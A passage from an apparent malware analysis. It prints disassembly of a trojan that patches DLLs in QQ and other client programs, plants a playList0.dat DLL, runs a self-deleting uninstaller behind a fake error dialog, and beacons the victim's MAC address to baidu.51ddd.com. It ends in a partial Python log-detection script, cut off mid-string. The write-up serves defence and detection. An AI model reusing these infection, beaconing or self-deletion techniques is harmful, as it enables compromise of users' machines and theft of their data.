The infection dispatcher (sub_401990, below) is again a 7-way switch on the product index. Each case validates the directory with sub_401960, appends the name of the DLL to patch (the constants visible in the listing are \QQGroupMng.dll, \common\ProcMsg.dll, \skmsg.dll, \Media2.dll, \1.1.0.2640\fds.dll together with \fds.dll, and \Program\BugReport.dll; the QQ2009 name, off_40847C, is not shown) and then calls the patcher sub_401690 with a second argument of 64h, retrying up to 32h (50) times with Sleep(10 ms) between attempts until it returns non-zero. The listing ends before loc_401E0C, so the copy of playList0.dat is not visible here.

.nsp0:00401990 sub esp, 218h
.nsp0:00401996 push ebx
.nsp0:00401997 push ebp
.nsp0:00401998 push esi
.nsp0:00401999 push edi
.nsp0:0040199A xor ebp, ebp
.nsp0:0040199C mov ecx, 7Fh
.nsp0:004019A1 xor eax, eax
.nsp0:004019A3 lea edi, [esp+228h+var_1FE]
.nsp0:004019A7 mov [esp+228h+Str], bp
.nsp0:004019AC push 0Bh
.nsp0:004019AE rep stosd
.nsp0:004019B0 stosw
.nsp0:004019B2 xor eax, eax
.nsp0:004019B4 lea ecx, [esp+22Ch+Source]
.nsp0:004019B8 mov [esp+22Ch+var_216], eax
.nsp0:004019BC push ecx
.nsp0:004019BD mov [esp+230h+var_212], eax
.nsp0:004019C1 xor esi, esi
.nsp0:004019C3 mov [esp+230h+var_20E], eax
.nsp0:004019C7 xor ebx, ebx
.nsp0:004019C9 mov [esp+230h+var_20A], eax
.nsp0:004019CD mov [esp+230h+Source], bp
.nsp0:004019D2 mov [esp+230h+var_206], eax
.nsp0:004019D6 call sub_4011E0
.nsp0:004019DB mov eax, [esp+230h+arg_0]
.nsp0:004019E2 add esp, 8
.nsp0:004019E5 cmp eax, 6 ; switch 7 cases
.nsp0:004019E8 ja loc_401E14 ; default
.nsp0:004019EE jmp off_401E4C[eax*4] ; switch jump
.nsp0:004019F5
.nsp0:004019F5 loc_4019F5: ; DATA XREF: .nsp0:off_401E4Co
.nsp0:004019F5 mov edx, lpFileName ; jumptable 004019EE case 0
.nsp0:004019FB push 1 ; char
.nsp0:004019FD push edx ; lpFileName
.nsp0:004019FE call sub_401960
.nsp0:00401A03 add esp, 8
.nsp0:00401A06 test al, al
.nsp0:00401A08 jz loc_401E14 ; default
.nsp0:00401A0E mov eax, lpFileName
.nsp0:00401A13 lea ecx, [esp+228h+Str]
.nsp0:00401A17 push eax ; Source
.nsp0:00401A18 push ecx ; Dest
.nsp0:00401A19 call _wcscat
.nsp0:00401A1E mov edx, lpFileName
.nsp0:00401A24 push offset aQqgroupmng_dll ; "\\QQGroupMng.dll"
.nsp0:00401A29 push edx ; Dest
.nsp0:00401A2A call _wcscat
.nsp0:00401A2F mov edi, Sleep
.nsp0:00401A35 add esp, 10h
.nsp0:00401A38
.nsp0:00401A38 loc_401A38: ; CODE XREF: sub_401990+CCj
.nsp0:00401A38 cmp ebx, 32h
.nsp0:00401A3B jge short loc_401A60
.nsp0:00401A3D mov ecx, lpFileName
.nsp0:00401A43 lea eax, [esp+228h+Source]
.nsp0:00401A47 push eax ; int
.nsp0:00401A48 push 64h ; lDistanceToMove
.nsp0:00401A4A push ecx ; lpFileName
.nsp0:00401A4B call sub_401690
.nsp0:00401A50 add esp, 0Ch
.nsp0:00401A53 mov esi, eax
.nsp0:00401A55 inc ebx
.nsp0:00401A56 push 0Ah ; dwMilliseconds
.nsp0:00401A58 call edi ; Sleep
.nsp0:00401A5A cmp esi, ebp
.nsp0:00401A5C jz short loc_401A38
.nsp0:00401A5E jmp short loc_401A68
.nsp0:00401A60 ; ---------------------------------------------------------------------------
.nsp0:00401A60
.nsp0:00401A60 loc_401A60: ; CODE XREF: sub_401990+ABj
.nsp0:00401A60 cmp esi, ebp
.nsp0:00401A62 jz loc_401E14 ; default
.nsp0:00401A68
.nsp0:00401A68 loc_401A68: ; CODE XREF: sub_401990+CEj
.nsp0:00401A68 lea edx, [esp+228h+Str]
.nsp0:00401A6C push offset word_4084A0 ; Source
.nsp0:00401A71 push edx ; Dest
.nsp0:00401A72 call _wcscat
.nsp0:00401A77 lea eax, [esp+230h+Source]
.nsp0:00401A7B lea ecx, [esp+230h+Str]
.nsp0:00401A7F push eax
.nsp0:00401A80 push ecx
.nsp0:00401A81 jmp loc_401E0C
.nsp0:00401A86 ; ---------------------------------------------------------------------------
.nsp0:00401A86
.nsp0:00401A86 loc_401A86: ; CODE XREF: sub_401990+5Ej
.nsp0:00401A86 ; DATA XREF: .nsp0:off_401E4Co
.nsp0:00401A86 mov edx, dword_40AAB4 ; jumptable 004019EE case 1
.nsp0:00401A8C push 1 ; char
.nsp0:00401A8E push edx ; lpFileName
.nsp0:00401A8F call sub_401960
.nsp0:00401A94 add esp, 8
.nsp0:00401A97 test al, al
.nsp0:00401A99 jz loc_401E14 ; default
.nsp0:00401A9F mov eax, dword_40AAB4
.nsp0:00401AA4 lea ecx, [esp+228h+Str]
.nsp0:00401AA8 push eax ; Source
.nsp0:00401AA9 push ecx ; Dest
.nsp0:00401AAA call _wcscat
.nsp0:00401AAF mov edx, dword_40AAB4
.nsp0:00401AB5 push offset off_40847C ; Source
.nsp0:00401ABA push edx ; Dest
.nsp0:00401ABB call _wcscat
.nsp0:00401AC0 mov edi, Sleep
.nsp0:00401AC6 add esp, 10h
.nsp0:00401AC9
.nsp0:00401AC9 loc_401AC9: ; CODE XREF: sub_401990+15Dj
.nsp0:00401AC9 cmp ebx, 32h
.nsp0:00401ACC jge short loc_401AF1
.nsp0:00401ACE mov ecx, dword_40AAB4
.nsp0:00401AD4 lea eax, [esp+228h+Source]
.nsp0:00401AD8 push eax ; int
.nsp0:00401AD9 push 64h ; lDistanceToMove
.nsp0:00401ADB push ecx ; lpFileName
.nsp0:00401ADC call sub_401690
.nsp0:00401AE1 add esp, 0Ch
.nsp0:00401AE4 mov esi, eax
.nsp0:00401AE6 inc ebx
.nsp0:00401AE7 push 0Ah ; dwMilliseconds
.nsp0:00401AE9 call edi ; Sleep
.nsp0:00401AEB cmp esi, ebp
.nsp0:00401AED jz short loc_401AC9
.nsp0:00401AEF jmp short loc_401AF9
.nsp0:00401AF1 ; ---------------------------------------------------------------------------
.nsp0:00401AF1
.nsp0:00401AF1 loc_401AF1: ; CODE XREF: sub_401990+13Cj
.nsp0:00401AF1 cmp esi, ebp
.nsp0:00401AF3 jz loc_401E14 ; default
.nsp0:00401AF9
.nsp0:00401AF9 loc_401AF9: ; CODE XREF: sub_401990+15Fj
.nsp0:00401AF9 lea edx, [esp+228h+Str]
.nsp0:00401AFD push offset off_408470 ; Source
.nsp0:00401B02 push edx ; Dest
.nsp0:00401B03 call _wcscat
.nsp0:00401B08 lea eax, [esp+230h+Source]
.nsp0:00401B0C lea ecx, [esp+230h+Str]
.nsp0:00401B10 push eax
.nsp0:00401B11 push ecx
.nsp0:00401B12 jmp loc_401E0C
.nsp0:00401B17 ; ---------------------------------------------------------------------------
.nsp0:00401B17
.nsp0:00401B17 loc_401B17: ; CODE XREF: sub_401990+5Ej
.nsp0:00401B17 ; DATA XREF: .nsp0:off_401E4Co
.nsp0:00401B17 mov edx, dword_40AAB0 ; jumptable 004019EE case 2
.nsp0:00401B1D push 1 ; char
.nsp0:00401B1F push edx ; lpFileName
.nsp0:00401B20 call sub_401960
.nsp0:00401B25 add esp, 8
.nsp0:00401B28 test al, al
.nsp0:00401B2A jz loc_401E14 ; default
.nsp0:00401B30 mov eax, dword_40AAB0
.nsp0:00401B35 lea ecx, [esp+228h+Str]
.nsp0:00401B39 push eax ; Source
.nsp0:00401B3A push ecx ; Dest
.nsp0:00401B3B call _wcscat
.nsp0:00401B40 mov edx, dword_40AAB0
.nsp0:00401B46 push offset aCommonProcmsg_ ; "\\common\\ProcMsg.dll"
.nsp0:00401B4B push edx ; Dest
.nsp0:00401B4C call _wcscat
.nsp0:00401B51 mov edi, Sleep
.nsp0:00401B57 add esp, 10h
.nsp0:00401B5A
.nsp0:00401B5A loc_401B5A: ; CODE XREF: sub_401990+1EEj
.nsp0:00401B5A cmp ebx, 32h
.nsp0:00401B5D jge short loc_401B82
.nsp0:00401B5F mov ecx, dword_40AAB0
.nsp0:00401B65 lea eax, [esp+228h+Source]
.nsp0:00401B69 push eax ; int
.nsp0:00401B6A push 64h ; lDistanceToMove
.nsp0:00401B6C push ecx ; lpFileName
.nsp0:00401B6D call sub_401690
.nsp0:00401B72 add esp, 0Ch
.nsp0:00401B75 mov esi, eax
.nsp0:00401B77 inc ebx
.nsp0:00401B78 push 0Ah ; dwMilliseconds
.nsp0:00401B7A call edi ; Sleep
.nsp0:00401B7C cmp esi, ebp
.nsp0:00401B7E jz short loc_401B5A
.nsp0:00401B80 jmp short loc_401B8A
.nsp0:00401B82 ; ---------------------------------------------------------------------------
.nsp0:00401B82
.nsp0:00401B82 loc_401B82: ; CODE XREF: sub_401990+1CDj
.nsp0:00401B82 cmp esi, ebp
.nsp0:00401B84 jz loc_401E14 ; default
.nsp0:00401B8A
.nsp0:00401B8A loc_401B8A: ; CODE XREF: sub_401990+1F0j
.nsp0:00401B8A lea edx, [esp+228h+Source]
.nsp0:00401B8E lea eax, [esp+228h+Str]
.nsp0:00401B92 push edx ; Source
.nsp0:00401B93 push eax ; Dest
.nsp0:00401B94 call _wcscat
.nsp0:00401B99 add esp, 8
.nsp0:00401B9C jmp loc_401E14 ; default
.nsp0:00401BA1 ; ---------------------------------------------------------------------------
.nsp0:00401BA1
.nsp0:00401BA1 loc_401BA1: ; CODE XREF: sub_401990+5Ej
.nsp0:00401BA1 ; DATA XREF: .nsp0:off_401E4Co
.nsp0:00401BA1 mov ecx, dword_40AA9C ; jumptable 004019EE case 3
.nsp0:00401BA7 push 1 ; char
.nsp0:00401BA9 push ecx ; lpFileName
.nsp0:00401BAA call sub_401960
.nsp0:00401BAF add esp, 8
.nsp0:00401BB2 test al, al
.nsp0:00401BB4 jz loc_401E14 ; default
.nsp0:00401BBA mov edx, dword_40AA9C
.nsp0:00401BC0 lea eax, [esp+228h+Str]
.nsp0:00401BC4 push edx ; Source
.nsp0:00401BC5 push eax ; Dest
.nsp0:00401BC6 call _wcscat
.nsp0:00401BCB mov ecx, dword_40AA9C
.nsp0:00401BD1 push offset aSkmsg_dll ; "\\skmsg.dll"
.nsp0:00401BD6 push ecx ; Dest
.nsp0:00401BD7 call _wcscat
.nsp0:00401BDC mov edi, Sleep
.nsp0:00401BE2 add esp, 10h
.nsp0:00401BE5
.nsp0:00401BE5 loc_401BE5: ; CODE XREF: sub_401990+27Cj
.nsp0:00401BE5 cmp ebx, 32h
.nsp0:00401BE8 jge loc_401C7B
.nsp0:00401BEE mov eax, dword_40AA9C
.nsp0:00401BF3 lea edx, [esp+228h+Source]
.nsp0:00401BF7 push edx ; int
.nsp0:00401BF8 push 64h ; lDistanceToMove
.nsp0:00401BFA push eax ; lpFileName
.nsp0:00401BFB call sub_401690
.nsp0:00401C00 add esp, 0Ch
.nsp0:00401C03 mov esi, eax
.nsp0:00401C05 inc ebx
.nsp0:00401C06 push 0Ah ; dwMilliseconds
.nsp0:00401C08 call edi ; Sleep
.nsp0:00401C0A cmp esi, ebp
.nsp0:00401C0C jz short loc_401BE5
.nsp0:00401C0E jmp short loc_401C83
.nsp0:00401C10 ; ---------------------------------------------------------------------------
.nsp0:00401C10
.nsp0:00401C10 loc_401C10: ; CODE XREF: sub_401990+5Ej
.nsp0:00401C10 ; DATA XREF: .nsp0:off_401E4Co
.nsp0:00401C10 mov ecx, dword_40AA98 ; jumptable 004019EE case 4
.nsp0:00401C16 push 1 ; char
.nsp0:00401C18 push ecx ; lpFileName
.nsp0:00401C19 call sub_401960
.nsp0:00401C1E add esp, 8
.nsp0:00401C21 test al, al
.nsp0:00401C23 jz loc_401E14 ; default
.nsp0:00401C29 mov edx, dword_40AA98
.nsp0:00401C2F lea eax, [esp+228h+Str]
.nsp0:00401C33 push edx ; Source
.nsp0:00401C34 push eax ; Dest
.nsp0:00401C35 call _wcscat
.nsp0:00401C3A mov ecx, dword_40AA98
.nsp0:00401C40 push offset aMedia2_dll ; "\\Media2.dll"
.nsp0:00401C45 push ecx ; Dest
.nsp0:00401C46 call _wcscat
.nsp0:00401C4B mov edi, Sleep
.nsp0:00401C51 add esp, 10h
.nsp0:00401C54
.nsp0:00401C54 loc_401C54: ; CODE XREF: sub_401990+2E7j
.nsp0:00401C54 cmp ebx, 32h
.nsp0:00401C57 jge short loc_401C7B
.nsp0:00401C59 mov eax, dword_40AA98
.nsp0:00401C5E lea edx, [esp+228h+Source]
.nsp0:00401C62 push edx ; int
.nsp0:00401C63 push 64h ; lDistanceToMove
.nsp0:00401C65 push eax ; lpFileName
.nsp0:00401C66 call sub_401690
.nsp0:00401C6B add esp, 0Ch
.nsp0:00401C6E mov esi, eax
.nsp0:00401C70 inc ebx
.nsp0:00401C71 push 0Ah ; dwMilliseconds
.nsp0:00401C73 call edi ; Sleep
.nsp0:00401C75 cmp esi, ebp
.nsp0:00401C77 jz short loc_401C54
.nsp0:00401C79 jmp short loc_401C83
.nsp0:00401C7B ; ---------------------------------------------------------------------------
.nsp0:00401C7B
.nsp0:00401C7B loc_401C7B: ; CODE XREF: sub_401990+258j
.nsp0:00401C7B ; sub_401990+2C7j
.nsp0:00401C7B cmp esi, ebp
.nsp0:00401C7D jz loc_401E14 ; default
.nsp0:00401C83
.nsp0:00401C83 loc_401C83: ; CODE XREF: sub_401990+27Ej
.nsp0:00401C83 ; sub_401990+2E9j
.nsp0:00401C83 lea ecx, [esp+228h+Str]
.nsp0:00401C87 push offset word_4084A0 ; Source
.nsp0:00401C8C push ecx ; Dest
.nsp0:00401C8D call _wcscat
.nsp0:00401C92 lea edx, [esp+230h+Source]
.nsp0:00401C96 lea eax, [esp+230h+Str]
.nsp0:00401C9A push edx
.nsp0:00401C9B push eax
.nsp0:00401C9C jmp loc_401E0C
.nsp0:00401CA1 ; ---------------------------------------------------------------------------
.nsp0:00401CA1
.nsp0:00401CA1 loc_401CA1: ; CODE XREF: sub_401990+5Ej
.nsp0:00401CA1 ; DATA XREF: .nsp0:off_401E4Co
.nsp0:00401CA1 mov ecx, dword_40AA90 ; jumptable 004019EE case 5
.nsp0:00401CA7 push 1 ; char
.nsp0:00401CA9 push ecx ; lpFileName
.nsp0:00401CAA call sub_401960
.nsp0:00401CAF add esp, 8
.nsp0:00401CB2 test al, al
.nsp0:00401CB4 jz loc_401E14 ; default
.nsp0:00401CBA mov edx, dword_40AA90
.nsp0:00401CC0 lea eax, [esp+228h+Str]
.nsp0:00401CC4 push edx ; Source
.nsp0:00401CC5 push eax ; Dest
.nsp0:00401CC6 call _wcscat
.nsp0:00401CCB mov ecx, dword_40AA90
.nsp0:00401CD1 mov edx, Dest
.nsp0:00401CD7 push ecx ; Source
.nsp0:00401CD8 push edx ; Dest
.nsp0:00401CD9 call _wcscat
.nsp0:00401CDE mov eax, dword_40AA90
.nsp0:00401CE3 push offset a1_1_0_2640Fds_ ; "\\1.1.0.2640\\fds.dll"
.nsp0:00401CE8 push eax ; Dest
.nsp0:00401CE9 call _wcscat
.nsp0:00401CEE mov ecx, Dest
.nsp0:00401CF4 push offset aFds_dll ; "\\fds.dll"
.nsp0:00401CF9 push ecx ; Dest
.nsp0:00401CFA call _wcscat
.nsp0:00401CFF mov ebp, Sleep
.nsp0:00401D05 add esp, 20h
.nsp0:00401D08
.nsp0:00401D08 loc_401D08: ; CODE XREF: sub_401990+39Bj
.nsp0:00401D08 cmp ebx, 32h
.nsp0:00401D0B jge short loc_401D2F
.nsp0:00401D0D mov eax, dword_40AA90
.nsp0:00401D12 lea edx, [esp+228h+Source]
.nsp0:00401D16 push edx ; int
.nsp0:00401D17 push 64h ; lDistanceToMove
.nsp0:00401D19 push eax ; lpFileName
.nsp0:00401D1A call sub_401690
.nsp0:00401D1F add esp, 0Ch
.nsp0:00401D22 mov esi, eax
.nsp0:00401D24 inc ebx
.nsp0:00401D25 push 0Ah ; dwMilliseconds
.nsp0:00401D27 call ebp ; Sleep
.nsp0:00401D29 test esi, esi
.nsp0:00401D2B jz short loc_401D08
.nsp0:00401D2D jmp short loc_401D37
.nsp0:00401D2F ; ---------------------------------------------------------------------------
.nsp0:00401D2F
.nsp0:00401D2F loc_401D2F: ; CODE XREF: sub_401990+37Bj
.nsp0:00401D2F test esi, esi
.nsp0:00401D31 jz loc_401E14 ; default
.nsp0:00401D37
.nsp0:00401D37 loc_401D37: ; CODE XREF: sub_401990+39Dj
.nsp0:00401D37 lea ecx, [esp+228h+Str]
.nsp0:00401D3B push offset word_4084A0 ; Source
.nsp0:00401D40 push ecx ; Dest
.nsp0:00401D41 xor edi, edi
.nsp0:00401D43 call _wcscat
.nsp0:00401D48 lea edx, [esp+230h+Source]
.nsp0:00401D4C lea eax, [esp+230h+Str]
.nsp0:00401D50 push edx ; Source
.nsp0:00401D51 push eax ; Dest
.nsp0:00401D52 call _wcscat
.nsp0:00401D57 add esp, 10h
.nsp0:00401D5A
.nsp0:00401D5A loc_401D5A: ; CODE XREF: sub_401990+3F2j
.nsp0:00401D5A cmp edi, 32h
.nsp0:00401D5D jge loc_401E14 ; default
.nsp0:00401D63 mov edx, Dest
.nsp0:00401D69 lea ecx, [esp+228h+Source]
.nsp0:00401D6D push ecx ; int
.nsp0:00401D6E push 64h ; lDistanceToMove
.nsp0:00401D70 push edx ; lpFileName
.nsp0:00401D71 call sub_401690
.nsp0:00401D76 add esp, 0Ch
.nsp0:00401D79 mov esi, eax
.nsp0:00401D7B inc edi
.nsp0:00401D7C push 0Ah ; dwMilliseconds
.nsp0:00401D7E call ebp ; Sleep
.nsp0:00401D80 test esi, esi
.nsp0:00401D82 jz short loc_401D5A
.nsp0:00401D84 jmp loc_401E14 ; default
.nsp0:00401D89 ; ---------------------------------------------------------------------------
.nsp0:00401D89
.nsp0:00401D89 loc_401D89: ; CODE XREF: sub_401990+5Ej
.nsp0:00401D89 ; DATA XREF: .nsp0:off_401E4Co
.nsp0:00401D89 mov eax, dword_40AA94 ; jumptable 004019EE case 6
.nsp0:00401D8E push 1 ; char
.nsp0:00401D90 push eax ; lpFileName
.nsp0:00401D91 call sub_401960
.nsp0:00401D96 add esp, 8
.nsp0:00401D99 test al, al
.nsp0:00401D9B jz short loc_401E14 ; default
.nsp0:00401D9D mov ecx, dword_40AA94
.nsp0:00401DA3 lea edx, [esp+228h+Str]
.nsp0:00401DA7 push ecx ; Source
.nsp0:00401DA8 push edx ; Dest
.nsp0:00401DA9 call _wcscat
.nsp0:00401DAE mov eax, dword_40AA94
.nsp0:00401DB3 push offset aProgramBugrepo ; "\\Program\\BugReport.dll"
.nsp0:00401DB8 push eax ; Dest
.nsp0:00401DB9 call _wcscat
.nsp0:00401DBE mov edi, Sleep
.nsp0:00401DC4 add esp, 10h
.nsp0:00401DC7
.nsp0:00401DC7 loc_401DC7: ; CODE XREF: sub_401990+45Bj
.nsp0:00401DC7 cmp ebx, 32h
.nsp0:00401DCA jge short loc_401DEF
.nsp0:00401DCC mov edx, dword_40AA94
.nsp0:00401DD2 lea ecx, [esp+228h+Source]
.nsp0:00401DD6 push ecx ; int
.nsp0:00401DD7 push 64h ; lDistanceToMove
.nsp0:00401DD9 push edx ; lpFileName
.nsp0:00401DDA call sub_401690
.nsp0:00401DDF add esp, 0Ch
.nsp0:00401DE2 mov esi, eax
.nsp0:00401DE4 inc ebx
.nsp0:00401DE5 push 0Ah ; dwMilliseconds
.nsp0:00401DE7 call edi ; Sleep
.nsp0:00401DE9 cmp esi, ebp
.nsp0:00401DEB jz short loc_401DC7
.nsp0:00401DED jmp short loc_401DF3
.nsp0:00401DEF ; ---------------------------------------------------------------------------
.nsp0:00401DEF
.nsp0:00401DEF loc_401DEF: ; CODE XREF: sub_401990+43Aj
.nsp0:00401DEF cmp esi, ebp
.nsp0:00401DF1 jz short loc_401E14 ; default
.nsp0:00401DF3
.nsp0:00401DF3 loc_401DF3: ; CODE XREF: sub_401990+45Dj
.nsp0:00401DF3 lea eax, [esp+228h+Str]
.nsp0:00401DF7 push offset aProgram ; "\\Program\"
.nsp0:00401DFC push eax ; Dest
.nsp0:00401DFD call _wcscat
.nsp0:00401E02 lea ecx, [esp+230h+Source]
.nsp0:00401E06 lea edx, [esp+230h+Str]
.nsp0:00401E0A push ecx ; Source
.nsp0:00401E0B push edx ; Dest
.nsp0:00401E0C
.nsp0:00401E0C loc_401E0C: ; CODE XREF: sub_401990+F1j
.nsp0:00401E0C ; sub_401990+182j ...
.nsp0:00401E0C call _wcscat
.nsp0:00401E11 add esp, 10h
.nsp0:00401E14
.nsp0:00401E14 loc_401E14: ; CODE XREF: sub_401990+58j
.nsp0:00401E14 ; sub_401990+78j ...
.nsp0:00401E14 lea eax, [esp+228h+Str] ; default
.nsp0:00401E18 push eax ; Str
.nsp0:00401E19 call _wcslen
.nsp0:00401E1E add esp, 4
.nsp0:00401E21 test eax, eax
.nsp0:00401E23 pop edi
.nsp0:00401E24 pop esi
.nsp0:00401E25 pop ebp
.nsp0:00401E26 pop ebx
.nsp0:00401E27 jbe short loc_401E42
.nsp0:00401E29 lea ecx, [esp+218h+Str]
.nsp0:00401E2D push 1 ; bFailIfExists
.nsp0:00401E2F push ecx ; lpNewFileName
.nsp0:00401E30 push offset aCWindowsTempPl ; "C:\\WINDOWS\\temp\\playList0.dat"
.nsp0:00401E35 call CopyFileW
.nsp0:00401E3B add esp, 218h
.nsp0:00401E41 retn
.nsp0:00401E42 ; ---------------------------------------------------------------------------
.nsp0:00401E42
.nsp0:00401E42 loc_401E42: ; CODE XREF: sub_401990+497j
.nsp0:00401E42 xor eax, eax
.nsp0:00401E44 add esp, 218h
.nsp0:00401E4A retn
.nsp0:00401E4A sub_401990 endp
5: Delete the file C:\\WINDOWS\\temp\\playList0.dat
.nsp0:004020CE push offset aCWindowsTempPl ; "C:\\WINDOWS\\temp\\playList0.dat"
.nsp0:004020D3 call DeleteFileW
6: Call ShellExecuteW to run C:\\WINDOWS\\temp\\uninstaller.exe with the current trojan's path as its parameter. uninstaller.exe pops up a fake archive-extraction error dialog and then deletes the virus itself.
.nsp0:00402106 push 0 ; nShowCmd
.nsp0:00402108 lea edx, [esp+224h+Parameters]
.nsp0:0040210C push 0 ; lpDirectory
.nsp0:0040210E push edx ; lpParameters
.nsp0:0040210F push offset FileName ; "C:\\WINDOWS\\temp\\uninstaller.exe"
.nsp0:00402114 push offset Operation ; "open"
.nsp0:00402119 push 0 ; hwnd
.nsp0:0040211B call ShellExecuteW
Analysis of the playList0.dat file:
1: First, the encrypted strings are decrypted:
baidu.51ddd.com
C:\\WINDOWS\\system32\\Com\\comreat.mml
/tongji/tongji.asp?id=2&mac=
/rising.txt
/rising/
.nsp0:10001100 push edi
.nsp0:10001101 push 200h ; unsigned int
.nsp0:10001106 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:1000110B push 200h ; unsigned int
.nsp0:10001110 mov lpszServerName, eax
.nsp0:10001115 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:1000111A push 200h ; unsigned int
.nsp0:1000111F mov pszPath, eax
.nsp0:10001124 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:10001129 push 200h ; unsigned int
.nsp0:1000112E mov lpszObjectName, eax
.nsp0:10001133 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:10001138 push 200h ; unsigned int
.nsp0:1000113D mov dword_1000AF14, eax
.nsp0:10001142 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:10001147 push 1000h ; unsigned int
.nsp0:1000114C mov dword_1000AF10, eax
.nsp0:10001151 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:10001156 mov edi, eax
.nsp0:10001158 mov ecx, 400h
.nsp0:1000115D xor eax, eax
.nsp0:1000115F mov dword_1000AF30, edi
.nsp0:10001165 rep stosd
.nsp0:10001167 push 1000h ; unsigned int
.nsp0:1000116C call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:10001171 mov edi, eax
.nsp0:10001173 mov ecx, 400h
.nsp0:10001178 xor eax, eax
.nsp0:1000117A mov dword_1000AF2C, edi
.nsp0:10001180 rep stosd
.nsp0:10001182 push 1000h ; unsigned int
.nsp0:10001187 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:1000118C mov edi, eax
.nsp0:1000118E mov ecx, 400h
.nsp0:10001193 xor eax, eax
.nsp0:10001195 mov dword_1000AF28, edi
.nsp0:1000119B rep stosd
.nsp0:1000119D push 6800h ; unsigned int
.nsp0:100011A2 call ??2@YAPAXI@Z ; operator new(uint)
.nsp0:100011A7 mov edi, eax
.nsp0:100011A9 mov ecx, 1A00h
.nsp0:100011AE xor eax, eax
.nsp0:100011B0 mov dword_1000AF24, edi
.nsp0:100011B6 rep stosd
.nsp0:100011B8 mov eax, lpszServerName
.nsp0:100011BD push eax ; int
.nsp0:100011BE push offset Str ; Str
.nsp0:100011C3 call sub_10001000
.nsp0:100011C8 mov ecx, pszPath
.nsp0:100011CE push ecx ; int
.nsp0:100011CF push offset aQwX ; "~qw}x~"
.nsp0:100011D4 call sub_10001000
.nsp0:100011D9 mov edx, lpszObjectName
.nsp0:100011DF push edx ; int
.nsp0:100011E0 push offset asc_1000A148 ; "|}"
.nsp0:100011E5 call sub_10001000
.nsp0:100011EA mov eax, dword_1000AF10
.nsp0:100011EF push eax ; int
.nsp0:100011F0 push offset asc_1000A228 ; "|}"
.nsp0:100011F5 call sub_10001000
.nsp0:100011FA mov ecx, dword_1000AF14
.nsp0:10001200 add esp, 44h
.nsp0:10001203 push ecx ; int
.nsp0:10001204 push offset asc_1000A1F4 ; "|}"
.nsp0:10001209 call sub_10001000
.nsp0:1000120E add esp, 8
.nsp0:10001211 pop edi
.nsp0:10001212 retn
2:
1: Call GetAdaptersInfo to obtain the MAC address, then send the collected information to http://baidu.51ddd.com/tongji/tongji.asp?id=2&mac=
.nsp0:10001395 push ebp ; dwFlags
.nsp0:10001396 push ebp ; lpszProxyBypass
.nsp0:10001397 push ebp ; lpszProxy
.nsp0:10001398 push ebp ; dwAccessType
.nsp0:10001399 push offset szAgent ; "http generic"
.nsp0:1000139E call InternetOpenW
.nsp0:100013A4 cmp eax, ebp
.nsp0:100013A6 pop ebx
.nsp0:100013A7 jz short loc_10001425
.nsp0:100013A9 mov ecx, lpszServerName
.nsp0:100013AF push ebp ; dwContext
.nsp0:100013B0 push ebp ; dwFlags
.nsp0:100013B1 push 3 ; dwService
.nsp0:100013B3 push offset szPassword ; "HTTP/1.0"
.nsp0:100013B8 push ebp ; lpszUserName
.nsp0:100013B9 push 50h ; nServerPort
.nsp0:100013BB push ecx ; lpszServerName
.nsp0:100013BC push eax ; hInternet
.nsp0:100013BD call InternetConnectW
.nsp0:100013C3 cmp eax, ebp
.nsp0:100013C5 jz short loc_10001425
.nsp0:100013C7 mov edx, lpszObjectName
.nsp0:100013CD push ebp ; dwContext
.nsp0:100013CE push 80000000h ; dwFlags
.nsp0:100013D3 push ebp ; lplpszAcceptTypes
.nsp0:100013D4 push ebp ; lpszReferrer
.nsp0:100013D5 push offset szPassword ; "HTTP/1.0"
.nsp0:100013DA push edx ; lpszObjectName
.nsp0:100013DB push offset szVerb ; "GET"
.nsp0:100013E0 push eax ; hConnect
.nsp0:100013E1 call HttpOpenRequestW
.nsp0:100013E7 mov esi, eax
.nsp0:100013E9 cmp esi, ebp
.nsp0:100013EB jz short loc_10001425
.nsp0:100013ED lea eax, [esp+9Ch+szHeaders]
.nsp0:100013F1 push 0A0000000h ; dwModifiers
.nsp0:100013F6 push eax ; Str
.nsp0:100013F7 call _wcslen
.nsp0:100013FC add esp, 4
.nsp0:100013FF lea ecx, [esp+0A0h+szHeaders]
.nsp0:10001403 push eax ; dwHeadersLength
.nsp0:10001404 push ecx ; lpszHeaders
.nsp0:10001405 push esi ; hRequest
.nsp0:10001406 call HttpAddRequestHeadersW
.nsp0:1000140C test eax, eax
.nsp0:1000140E jz short loc_10001425
.nsp0:10001410 push ebp ; dwOptionalLength
.nsp0:10001411 push ebp ; lpOptional
.nsp0:10001412 push ebp ; dwHeadersLength
.nsp0:10001413 push ebp ; lpszHeaders
.nsp0:10001414 push esi ; hRequest
.nsp0:10001415 call HttpSendRequestW
.nsp0:1000141B pop edi
.nsp0:1000141C pop esi
.nsp0:1000141D pop ebp
.nsp0:1000141E add esp, 90h
.nsp0:10001424 retn
.nsp0:10001425 ; ---------------------------------------------------------------------------
.nsp0:10001425
.nsp0:10001425 loc_10001425: ; CODE XREF: sub_100012C0+4Ej
.nsp0:10001425 ; sub_100012C0+E7j ...
.nsp0:10001425 pop edi
.nsp0:10001426 pop esi
.nsp0:10001427 xor eax, eax
.nsp0:10001429 pop ebp
.nsp0:1000142A add esp, 90h
.nsp0:10001430 retn
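The two requests above (the MAC beacon with User-Agent "http generic", and the rising.txt fetch with User-Agent "DownLoadPacket", both to baidu.51ddd.com) are easy to pick out of web-proxy logs. The following is an added example for this analysis, not code from the post; the log layout (one request per line as "client host method url user-agent") and the sample lines are constructed assumptions:

```python
"""Spot the playList0.dat DLL's HTTP traffic in web-proxy logs.

Added example, not code from the original post. The log layout is an
assumption: one request per line as "<client> <host> <method> <url> <user-agent>".
"""
from urllib.parse import parse_qs, urlsplit

# Indicators read straight from the listings above.
C2_HOST = "baidu.51ddd.com"
BEACON_PATH = "/tongji/tongji.asp"        # GET ...?id=2&mac=<MAC from GetAdaptersInfo>
CONFIG_PATH = "/rising.txt"               # download list
PAYLOAD_PREFIX = "/rising/"               # e.g. /rising/97.css
# User-Agent strings passed to InternetOpenW by the beacon and the downloader.
SUSPECT_AGENTS = {"http generic", "DownLoadPacket"}

# Constructed sample: two infected clients (one talking to a different host) and one benign request.
SAMPLE_LOG = """\
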